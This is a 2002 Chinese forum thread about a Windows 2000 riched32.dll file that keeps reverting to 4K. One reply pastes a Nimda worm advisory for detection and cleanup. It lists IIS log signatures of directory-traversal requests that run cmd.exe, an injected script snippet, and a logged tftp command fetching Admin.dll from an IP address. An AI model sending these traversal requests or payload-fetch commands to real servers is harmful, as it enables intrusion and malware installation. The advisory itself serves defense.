• 全部
  • 语言基础/算法/系统设计
  • 数据库相关
  • 图形处理/多媒体
  • 网络通信/分布式开发
  • VCL组件开发及应用
  • Windows SDK/API
  • 问答

见鬼了!!我的WIN2000的riched32.dll只有4K.复制一个正常的替换后,自己立刻就变成4k!晕呀!!在线给分!!

No15 2002-01-17 05:51:13
...全文
164 点赞 收藏 10
写回复
10 条回复
切换为时间正序
当前发帖距今超过3年,不再开放新的回复
发表回复
No15 2002-01-18
2000 的 riched32.dll 就是这么大吗??
但是!!我的SYSTEM32下的好多DLL文件(包括riched32.dll)的时间怎么都变成1900年了!
回复
comanche 2002-01-17
zzd 与说得没错, 但 2000 的 riched32.dll 就是这么大, 另一个是 riched20.dll
2000 用的 rich edit 是 3.0 版本就长这样
回复
zzd 2002-01-17
winnt\system32\dllcache中有一个备份,系统自动管理,先把备份干掉,再恢复就OK了
(第一遍发的怎么不见了?)
回复
zzd 2002-01-17
winnt\system32\dllcache中有一个备份,同时替换就行了
回复
samchung 2002-01-17
尼姆达病毒之所以能够迅速传播,是因为它的传播途径实在太丰富了。一位被尼姆达病毒害惨了的网友抱怨,我一没用盗版软件,二没打开可疑电子邮件,怎么就染上病毒了呢?尼姆达病毒的狡猾之处正在于此。据专家介绍,尼姆达既可以通过电子邮件、OICQ等网上即时通信工具传染,也可以通过修改网页,把病毒传染给访问该网页的人,它还能通过局域网传播,使局域网内部“一机染毒,全体遭殃”。更可怕的是,带有尼姆达病毒的电子邮件,不需你打开附件,只要阅读或预览了带病毒的邮件,你的机器就中招了,还会沦落为病毒的帮凶,继续发送带毒邮件给你通讯簿里的朋友。

   电脑病毒研究人员还发现,由于尼姆达对自己的发作时间进行了设置,在首次爆发后第10天,仍可能出现大规模反复发作。


一、攻击的目标系统:

该病毒可以感染Windows 95, 98, ME, NT,或者2000 ,以及 Windows NT and 2000服务器。

二、传播方式:

1、通过邮件传播出,当用户邮件的正文为空,似乎没有附件,实际上邮件中嵌入了病毒的执行代码,当用户用OUTLOOK、OUTLOOK EXPRESS(没有安装微软的补丁包的情况下)收邮件,在预览邮件时,病毒就已经执行了。

2、利用了IIS的漏洞,采用与“红色代码II”和“蓝色代码”类似的方式,
通过网络传播。

3、通过局域网的共享传播到其他系统。

4、感染EXE文件。

5、在html、asp文件中插入如下内容:

<html><scriptlanguage="JavaScript">window.open("readme.eml", null,

"resizable=no,top=6000,left=6000")</script></html>

使得用户浏览感染病毒的网站时,导致用户感染此病毒。
三、如何判定感染Nimda蠕虫病毒



1、感染此病毒的NT和2000服务器,在WINNT\SYSTEM32\LOGFILES\W3SVC1目录下的

 日志文件中含有以下内容

 GET /scripts/root.exe?/c+dir

 GET /MSADC/root.exe?/c+dir

 GET /c/winnt/system32/cmd.exe?/c+dir

 GET /d/winnt/system32/cmd.exe?/c+dir

 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir

 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir

 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir

 GET  

 /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir

 GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir

 GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir

 GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir

 GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir

 GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir

 GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir

 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir

 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

 GET, /scripts/..%5c../winnt/system32/cmd.exe

 如果日志存在以下内容,则表明该系统已受到感染,

 /c+tftp%20-i%2010.88.40.89%20GET%20Admin.dll%20c:\Admin.dll



2、感染病毒的Windows NT和2000系统中存在大量的readme.eml病毒文件和后缀为nws 的文件,长度为78K。在各个分区的根目录下存在Admin.dll文件(如:c:\admin.dll、 d:\admin.dll),其文件长度为56K(57344字节) 。在system目录下存在mmc.exe文件 ,文件长度也为56K。在c:\innetpub\scripts目录下存在tftpxxx的文件。这些都是病毒 代码。

3、Windows 9X系统中的system.ini文件内容被修改

 正常情况为:Shell = explorer.exe

 感染病毒后变为:Shell = explorer.exe load.exe -dontrunold

4、在Windows 9x系统下,存在如下文件load.exe、 riched20.dll,这些文件都是系统的 ,隐含的属性,需要修改文件 。磁盘的可写目录中存在很多后缀为eml的文件。

5、感染病毒的系统中,在c:\tmp目录下存在大量的mepxx.tmp.exe和mepxx.tmp文件。这 些都是病毒代码。

四、详细彻底解决方案 :
1、与网络断开,同时去掉磁盘的网络共享,防止进一步通过内网传染。

2、下载安装补丁程序

对于所有的IE浏览器(5.0版本以上的系统),要下载安装如下补丁:

Http://www.microsoft.com/technet/security/bulletin/MS01-020.asp

3、Windows 9x系统需要将system.ini中的Shell = explorer.exe load.exe -dontrunold  改为

  Shell = explorer.exe

4、删除wininit.ini文件中的内容。

5、用干净的 Riched20.DLL(大约100k)文件替换染毒的同名Riched20.DLL文件(57344字节),或重装Office。

6、如果使用的是WinNT或者Win2000,打开“控制面板|用户和密码”,将Administrator组中的guest帐号删除。

7、升级杀毒软件,然后使用杀毒软件清除系统中的病毒程序,必须注意由于杀读软件缺省 设置是检测程序文件,为了防止漏杀eml、tmp等带毒文件,清务必将杀毒软件设置为检 测、清除所有文件。

8、检测清除后,请重新启动系统,再次检查系统中是否还存在第三项中2、4、5子项中描 述的病毒文件。如果没有则表明已清除病毒。

9、NT/2000用户还需检查在WINNT\SYSTEM32\LOGFILES\W3SVC1目录下的日志文件中是否还含有以下内容

GET /scripts/root.exe?/c+dir

GET /MSADC/root.exe?/c+dir

GET /c/winnt/system32/cmd.exe?/c+dir

GET /d/winnt/system32/cmd.exe?/c+dir

GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir

GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir

GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir



如果存在这些内容,则表明系统还在遭受其他染毒系统的攻击,但是不会再感染病毒。


回复
samchung 2002-01-17
我的也是这么大,不是什么问题吧?
不过2000里对文件保护的好象很严,我也试过把自己写的东西换上去。但马上就被换回去了:(所以自己加的一些小东西都用不了
在98下如果Riched20.DLL大小是4k则是中了尼姆达,2000下应该没有什么事吧。
回复
No15 2002-01-17
我也怀疑是尼姆达 .可是哑用了好多杀毒软件都不行呀!!
help!!
回复
errorcode 2002-01-17
尼姆达
回复
fangzhe 2002-01-17
尼姆达变种
回复
bluetooth_2001 2002-01-17
不懂
回复
相关推荐
发帖
Delphi
创建于2007-08-02

4876

社区成员

Delphi 开发及应用
申请成为版主
帖子事件
创建了帖子
2002-01-17 05:51
社区公告
暂无公告